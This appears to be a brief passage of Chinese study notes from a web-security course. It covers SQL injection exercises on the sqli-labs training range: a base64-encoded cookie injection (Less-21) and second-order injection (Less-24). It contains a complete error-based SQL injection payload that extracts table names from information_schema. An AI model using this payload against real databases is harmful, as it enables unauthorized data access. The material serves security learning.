小迪v17
加解密
sqlilabs-page2-less21
可以看到对 cookie 进行了 base64 的处理
使用报错注入
')union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand()*2))x from information_schema.tables group by x#
进行base64加密
二次注入
sqli-less-24 二次注入
已知存在用户 admin
(线上靶场当然不知道),